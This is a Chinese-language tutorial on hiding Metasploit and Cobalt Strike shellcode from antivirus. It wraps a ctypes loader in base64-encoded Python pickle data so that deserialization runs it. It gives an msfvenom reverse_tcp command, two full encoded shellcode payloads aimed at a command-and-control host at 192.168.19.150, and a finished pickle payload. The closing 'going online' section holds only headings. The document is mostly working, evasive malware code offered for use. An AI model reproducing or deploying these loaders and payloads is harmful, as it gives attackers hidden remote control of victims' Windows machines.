免杀对抗-MSF\CS-shellcode反序列化


目录

1.py

2.py

上线过程


1.py

对代码段进行序列化数据生成

import pickle
import base64

#shellcode值如下面两块代码块,直接插进来即可
shellcode ='''

'''
class A(object):
    def __reduce__(self):
        return exec, (shellcode,)
#exec将shellcode的文本信息当作代码执行


ret = pickle.dumps(A())
ret_base64 = base64.b64encode(ret)
print(ret_base64)
#将生成的序列化数据即序列化shellcode插进2.py里面的shellcode,进行反序列化,编译的过程中将执行上述shellcode里面的文本当作代码执行


生成对象A的序列化数据并base64编码
对象A在干嘛?
调用魔术方法进行exec shellcode执行
shellcode是一整块源码,如下:

base64生成的加密payload:
msfvenom -p windows/meterpreter/reverse_tcp --encrypt base64 lhost=192.168.19.150 lport=6688 -f c


#以下是base64编码的上线py
import ctypes
import base64

encode_shellcode = b""
encode_shellcode += b"\x2f\x45\x69\x44\x35\x50\x44\x6f\x7a\x41\x41\x41\x41\x45"
encode_shellcode += b"\x46\x52\x51\x56\x42\x53\x53\x44\x48\x53\x5a\x55\x69\x4c"
encode_shellcode += b"\x55\x6d\x42\x49\x69\x31\x49\x59\x55\x56\x5a\x49\x69\x31"
encode_shellcode += b"\x49\x67\x54\x54\x48\x4a\x53\x41\x2b\x33\x53\x6b\x70\x49"
encode_shellcode += b"\x69\x33\x4a\x51\x53\x44\x48\x41\x72\x44\x78\x68\x66\x41"
encode_shellcode += b"\x49\x73\x49\x45\x48\x42\x79\x51\x31\x42\x41\x63\x48\x69"
encode_shellcode += b"\x37\x56\x4a\x42\x55\x55\x69\x4c\x55\x69\x43\x4c\x51\x6a"
encode_shellcode += b"\x78\x49\x41\x64\x42\x6d\x67\x58\x67\x59\x43\x77\x49\x50"
encode_shellcode += b"\x68\x58\x49\x41\x41\x41\x43\x4c\x67\x49\x67\x41\x41\x41"
encode_shellcode += b"\x42\x49\x68\x63\x42\x30\x5a\x30\x67\x42\x30\x49\x74\x49"
encode_shellcode += b"\x47\x45\x53\x4c\x51\x43\x42\x4a\x41\x64\x42\x51\x34\x31"
encode_shellcode += b"\x5a\x49\x2f\x38\x6c\x4e\x4d\x63\x6c\x42\x69\x7a\x53\x49"
encode_shellcode += b"\x53\x41\x48\x57\x53\x44\x48\x41\x72\x45\x48\x42\x79\x51"
encode_shellcode += b"\x31\x42\x41\x63\x45\x34\x34\x48\x58\x78\x54\x41\x4e\x4d"
encode_shellcode += b"\x4a\x41\x68\x46\x4f\x64\x46\x31\x32\x46\x68\x45\x69\x30"
encode_shellcode += b"\x41\x6b\x53\x51\x48\x51\x5a\x6b\x47\x4c\x44\x45\x68\x45"
encode_shellcode += b"\x69\x30\x41\x63\x53\x51\x48\x51\x51\x59\x73\x45\x69\x45"
encode_shellcode += b"\x67\x42\x30\x45\x46\x59\x51\x56\x68\x65\x57\x56\x70\x42"
encode_shellcode += b"\x57\x45\x46\x5a\x51\x56\x70\x49\x67\x2b\x77\x67\x51\x56"
encode_shellcode += b"\x4c\x2f\x34\x46\x68\x42\x57\x56\x70\x49\x69\x78\x4c\x70"
encode_shellcode += b"\x53\x2f\x2f\x2f\x2f\x31\x31\x4a\x76\x6e\x64\x7a\x4d\x6c"
encode_shellcode += b"\x38\x7a\x4d\x67\x41\x41\x51\x56\x5a\x4a\x69\x65\x5a\x49"
encode_shellcode += b"\x67\x65\x79\x67\x41\x51\x41\x41\x53\x59\x6e\x6c\x53\x62"
encode_shellcode += b"\x77\x43\x41\x42\x6f\x67\x77\x4b\x67\x54\x6c\x6b\x46\x55"
encode_shellcode += b"\x53\x59\x6e\x6b\x54\x49\x6e\x78\x51\x62\x70\x4d\x64\x79"
encode_shellcode += b"\x59\x48\x2f\x39\x56\x4d\x69\x65\x70\x6f\x41\x51\x45\x41"
encode_shellcode += b"\x41\x46\x6c\x42\x75\x69\x6d\x41\x61\x77\x44\x2f\x31\x57"
encode_shellcode += b"\x6f\x4b\x51\x56\x35\x51\x55\x45\x30\x78\x79\x55\x30\x78"
encode_shellcode += b"\x77\x45\x6a\x2f\x77\x45\x69\x4a\x77\x6b\x6a\x2f\x77\x45"
encode_shellcode += b"\x69\x4a\x77\x55\x47\x36\x36\x67\x2f\x66\x34\x50\x2f\x56"
encode_shellcode += b"\x53\x49\x6e\x48\x61\x68\x42\x42\x57\x45\x79\x4a\x34\x6b"
encode_shellcode += b"\x69\x4a\x2b\x55\x47\x36\x6d\x61\x56\x30\x59\x66\x2f\x56"
encode_shellcode += b"\x68\x63\x42\x30\x43\x6b\x6e\x2f\x7a\x6e\x58\x6c\x36\x4a"
encode_shellcode += b"\x4d\x41\x41\x41\x42\x49\x67\x2b\x77\x51\x53\x49\x6e\x69"
encode_shellcode += b"\x54\x54\x48\x4a\x61\x67\x52\x42\x57\x45\x69\x4a\x2b\x55"
encode_shellcode += b"\x47\x36\x41\x74\x6e\x49\x58\x2f\x2f\x56\x67\x2f\x67\x41"
encode_shellcode += b"\x66\x6c\x56\x49\x67\x38\x51\x67\x58\x6f\x6e\x32\x61\x6b"
encode_shellcode += b"\x42\x42\x57\x57\x67\x41\x45\x41\x41\x41\x51\x56\x68\x49"
encode_shellcode += b"\x69\x66\x4a\x49\x4d\x63\x6c\x42\x75\x6c\x69\x6b\x55\x2b"
encode_shellcode += b"\x58\x2f\x31\x55\x69\x4a\x77\x30\x6d\x4a\x78\x30\x30\x78"
encode_shellcode += b"\x79\x55\x6d\x4a\x38\x45\x69\x4a\x32\x6b\x69\x4a\x2b\x55"
encode_shellcode += b"\x47\x36\x41\x74\x6e\x49\x58\x2f\x2f\x56\x67\x2f\x67\x41"
encode_shellcode += b"\x66\x53\x68\x59\x51\x56\x64\x5a\x61\x41\x42\x41\x41\x41"
encode_shellcode += b"\x42\x42\x57\x47\x6f\x41\x57\x6b\x47\x36\x43\x79\x38\x50"
encode_shellcode += b"\x4d\x50\x2f\x56\x56\x31\x6c\x42\x75\x6e\x56\x75\x54\x57"
encode_shellcode += b"\x48\x2f\x31\x55\x6e\x2f\x7a\x75\x6b\x38\x2f\x2f\x2f\x2f"
encode_shellcode += b"\x53\x41\x48\x44\x53\x43\x6e\x47\x53\x49\x58\x32\x64\x62"
encode_shellcode += b"\x52\x42\x2f\x2b\x64\x59\x61\x67\x42\x5a\x53\x63\x66\x43"
encode_shellcode += b"\x38\x4c\x57\x69\x56\x76\x2f\x56"
#解码
shellcode = base64.b64decode(encode_shellcode)

ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x3000, 0x40)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(rwxpage), ctypes.create_string_buffer(shellcode), len(shellcode))
handle = ctypes.windll.kernel32.CreateThread(0, 0, ctypes.c_uint64(rwxpage), 0, 0, 0)
ctypes.windll.kernel32.WaitForSingleObject(handle, -1)


OR

import ctypes
import base64

# cs,需要将生成的payload进行base64加密
shellcode=b'/EiD5PDoyAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdBmgXgYCwJ1couAiAAAAEiFwHRnSAHQUItIGESLQCBJAdDjVkj/yUGLNIhIAdZNMclIMcCsQcHJDUEBwTjgdfFMA0wkCEU50XXYWESLQCRJAdBmQYsMSESLQBxJAdBBiwSISAHQQVhBWF5ZWkFYQVlBWkiD7CBBUv/gWEFZWkiLEulPXWoASb53aW5pbmV0AEFWSYnmTInxQbpMdyYH/9VIMclIMdJNMcBNMclBUEFQQbo6Vnmn/9Xrc1pIicFBuCAaAABNMclBUUFRagNBUUG6V4mfxv/V61lbSInBSDHSSYnYTTHJUmgAAkCEUlJBuutVLjv/1UiJxkiDw1BqCl9IifFIidpJx8D/TTHJUlJBui0GGHv/1YXAD4WdAQAASP/PD4SMAQAA69Pp5AEAAOiiL0dXeEcADBHQA2UlJG9WXfPOLnIMwVIadjd6T751LQjP7CzDvH5ii+loNJDvAnyGACcv6DgVmx9plvq5BnqrDGq+ziEAm9khqIda5KWYTQBVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoY29tcGF0aWJsZTsgTVNJRSA5LjA7IFdpbmRvd3MgTlQgNi4wOyBUcmlkZW50LzUuMDsgQk9JRTk7RU5VUykNCgDa5zqsyAsY1zK74s++6vU4oR1CRNd/GkETmSNwVwwlJ+utIczKGV1H14RMti8cB87ochv91yZE8prqplXb6ddXOMJfKy8b6yavtoUx3ZpqNVU6qpyT9bUfrxXOdzmS9bHmUgE3ec0/u43dDe6/n9WDipxDRlE7Xmx4Ht671qf0rYa6zNdjvnb+bUv1s6FzTJE/JRMyKvEX1fztPrWXKuAsDSIyhc9w4nRXfBZxLKtoLBQsq6ryEgbObXUCvFrKT5mGgvXfLZPf5YXE9jPrSPr6KdFpB6gAQb7wtaJW/9VIMcm6AABAAEG4ABAAAEG5QAAAAEG6WKRT5f/VSJNTU0iJ50iJ8UiJ2kG4ACAAAEmJ+UG6EpaJ4v/VSIPEIIXAdLZmiwdIAcOFwHXXWFhYSAUAAAAAUMPon/3//zE5Mi4xNjguMTkuMTUwABI0Vng='
#解密shellcode
shellcode=base64.b64decode(shellcode)
#添加加载器
ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x3000, 0x40)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(rwxpage), ctypes.create_string_buffer(shellcode), len(shellcode))
handle = ctypes.windll.kernel32.CreateThread(0, 0, ctypes.c_uint64(rwxpage), 0, 0, 0)
ctypes.windll.kernel32.WaitForSingleObject(handle, -1)


注:以上的shellcode脚本可以将加载器进行base64加密后在插入解密,绕过杀软效果更好,如下CS的payload为例:

import ctypes
import base64

# cs,需要将生成的payload进行base64加密
shellcode=b'/EiD5PDoyAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdBmgXgYCwJ1couAiAAAAEiFwHRnSAHQUItIGESLQCBJAdDjVkj/yUGLNIhIAdZNMclIMcCsQcHJDUEBwTjgdfFMA0wkCEU50XXYWESLQCRJAdBmQYsMSESLQBxJAdBBiwSISAHQQVhBWF5ZWkFYQVlBWkiD7CBBUv/gWEFZWkiLEulPXWoASb53aW5pbmV0AEFWSYnmTInxQbpMdyYH/9VIMclIMdJNMcBNMclBUEFQQbo6Vnmn/9Xrc1pIicFBuCAaAABNMclBUUFRagNBUUG6V4mfxv/V61lbSInBSDHSSYnYTTHJUmgAAkCEUlJBuutVLjv/1UiJxkiDw1BqCl9IifFIidpJx8D/TTHJUlJBui0GGHv/1YXAD4WdAQAASP/PD4SMAQAA69Pp5AEAAOiiL0dXeEcADBHQA2UlJG9WXfPOLnIMwVIadjd6T751LQjP7CzDvH5ii+loNJDvAnyGACcv6DgVmx9plvq5BnqrDGq+ziEAm9khqIda5KWYTQBVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoY29tcGF0aWJsZTsgTVNJRSA5LjA7IFdpbmRvd3MgTlQgNi4wOyBUcmlkZW50LzUuMDsgQk9JRTk7RU5VUykNCgDa5zqsyAsY1zK74s++6vU4oR1CRNd/GkETmSNwVwwlJ+utIczKGV1H14RMti8cB87ochv91yZE8prqplXb6ddXOMJfKy8b6yavtoUx3ZpqNVU6qpyT9bUfrxXOdzmS9bHmUgE3ec0/u43dDe6/n9WDipxDRlE7Xmx4Ht671qf0rYa6zNdjvnb+bUv1s6FzTJE/JRMyKvEX1fztPrWXKuAsDSIyhc9w4nRXfBZxLKtoLBQsq6ryEgbObXUCvFrKT5mGgvXfLZPf5YXE9jPrSPr6KdFpB6gAQb7wtaJW/9VIMcm6AABAAEG4ABAAAEG5QAAAAEG6WKRT5f/VSJNTU0iJ50iJ8UiJ2kG4ACAAAEmJ+UG6EpaJ4v/VSIPEIIXAdLZmiwdIAcOFwHXXWFhYSAUAAAAAUMPon/3//zE5Mi4xNjguMTkuMTUwABI0Vng='
#解密shellcode
shellcode=base64.b64decode(shellcode)
#下面的加载器是先经过base64加密的,所以得解密
z='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'
exec(base64.b64decode(z))
#修改后插入到shellcode位置处,1.py运行结果如下
#b'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'


2.py


另外一个反序列化解析 执行 上线

import base64
import ctypes
import pickle
#MSF
#shellcode = b'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'

#CS
shellcode = b'gASV0AYAAAAAAACMCGJ1aWx0aW5zlIwEZXhlY5STlFixBgAACmltcG9ydCBjdHlwZXMKaW1wb3J0IGJhc2U2NAoKIyBjcwpzaGVsbGNvZGU9YicvRWlENVBEb3lBQUFBRUZSUVZCU1VWWklNZEpsU0l0U1lFaUxVaGhJaTFJZ1NJdHlVRWdQdDBwS1RUSEpTREhBckR4aGZBSXNJRUhCeVExQkFjSGk3VkpCVVVpTFVpQ0xRanhJQWRCbWdYZ1lDd0oxY291QWlBQUFBRWlGd0hSblNBSFFVSXRJR0VTTFFDQkpBZERqVmtqL3lVR0xOSWhJQWRaTk1jbElNY0NzUWNISkRVRUJ3VGpnZGZGTUEwd2tDRVU1MFhYWVdFU0xRQ1JKQWRCbVFZc01TRVNMUUJ4SkFkQkJpd1NJU0FIUVFWaEJXRjVaV2tGWVFWbEJXa2lEN0NCQlV2L2dXRUZaV2tpTEV1bFAvLy8vWFdvQVNiNTNhVzVwYm1WMEFFRldTWW5tVElueFFicE1keVlILzlWSU1jbElNZEpOTWNCTk1jbEJVRUZRUWJvNlZubW4vOVhyYzFwSWljRkJ1Q0FhQUFCTk1jbEJVVUZSYWdOQlVVRzZWNG1meHYvVjYxbGJTSW5CU0RIU1NZbllUVEhKVW1nQUFrQ0VVbEpCdXV0Vkxqdi8xVWlKeGtpRHcxQnFDbDlJaWZGSWlkcEp4OEQvLy8vL1RUSEpVbEpCdWkwR0dIdi8xWVhBRDRXZEFRQUFTUC9QRDRTTUFRQUE2OVBwNUFFQUFPaWkvLy8vTDBkWGVFY0FEQkhRQTJVbEpHOVdYZlBPTG5JTXdWSWFkamQ2VDc1MUxRalA3Q3pEdkg1aWkrbG9OSkR2QW55R0FDY3Y2RGdWbXg5cGx2cTVCbnFyREdxK3ppRUFtOWtocUlkYTVLV1lUUUJWYzJWeUxVRm5aVzUwT2lCTmIzcHBiR3hoTHpVdU1DQW9ZMjl0Y0dGMGFXSnNaVHNnVFZOSlJTQTVMakE3SUZkcGJtUnZkM01nVGxRZ05pNHdPeUJVY21sa1pXNTBMelV1TURzZ1FrOUpSVGs3UlU1VlV5a05DZ0RhNXpxc3lBc1kxeks3NHMrKzZ2VTRvUjFDUk5kL0drRVRtU053Vnd3bEordXRJY3pLR1YxSDE0Uk10aThjQjg3b2NodjkxeVpFOHBycXBsWGI2ZGRYT01KZkt5OGI2eWF2dG9VeDNacHFOVlU2cXB5VDliVWZyeFhPZHptUzliSG1VZ0UzZWMwL3U0M2REZTYvbjlXRGlweERSbEU3WG14NEh0NjcxcWYwcllhNnpOZGp2bmIrYlV2MXM2RnpUSkUvSlJNeUt2RVgxZnp0UHJXWEt1QXNEU0l5aGM5dzRuUlhmQlp4TEt0b0xCUXNxNnJ5RWdiT2JYVUN2RnJLVDVtR2d2WGZMWlBmNVlYRTlqUHJTUHI2S2RGcEI2Z0FRYjd3dGFKVy85VklNY202QUFCQUFFRzRBQkFBQUVHNVFBQUFBRUc2V0tSVDVmL1ZTSk5UVTBpSjUwaUo4VWlKMmtHNEFDQUFBRW1KK1VHNkVwYUo0di9WU0lQRUlJWEFkTFptaXdkSUFjT0Z3SFhYV0ZoWVNBVUFBQUFBVU1Qb24vMy8vekU1TWk0eE5qZ3VNVGt1TVRVd0FCSTBWbmc9Jwoj6Kej5a+Gc2hlbGxjb2RlCnNoZWxsY29kZT1iYXNlNjQuYjY0ZGVjb2RlKHNoZWxsY29kZSkKI+a3u+WKoOWKoOi9veWZqApjdHlwZXMud2luZGxsLmtlcm5lbDMyLlZpcnR1YWxBbGxvYy5yZXN0eXBlID0gY3R5cGVzLmNfdWludDY0CnJ3eHBhZ2UgPSBjdHlwZXMud2luZGxsLmtlcm5lbDMyLlZpcnR1YWxBbGxvYygwLCBsZW4oc2hlbGxjb2RlKSwgMHgzMDAwLCAweDQwKQ
pjdHlwZXMud2luZGxsLmtlcm5lbDMyLlJ0bE1vdmVNZW1vcnkoY3R5cGVzLmNfdWludDY0KHJ3eHBhZ2UpLCBjdHlwZXMuY3JlYXRlX3N0cmluZ19idWZmZXIoc2hlbGxjb2RlKSwgbGVuKHNoZWxsY29kZSkpCmhhbmRsZSA9IGN0eXBlcy53aW5kbGwua2VybmVsMzIuQ3JlYXRlVGhyZWFkKDAsIDAsIGN0eXBlcy5jX3VpbnQ2NChyd3hwYWdlKSwgMCwgMCwgMCkKY3R5cGVzLndpbmRsbC5rZXJuZWwzMi5XYWl0Rm9yU2luZ2xlT2JqZWN0KGhhbmRsZSwgLTEplIWUUpQu'

pickle.loads(base64.b64decode(shellcode))


上线过程


以下以MSF的payload为例


以下以CS的payload为例
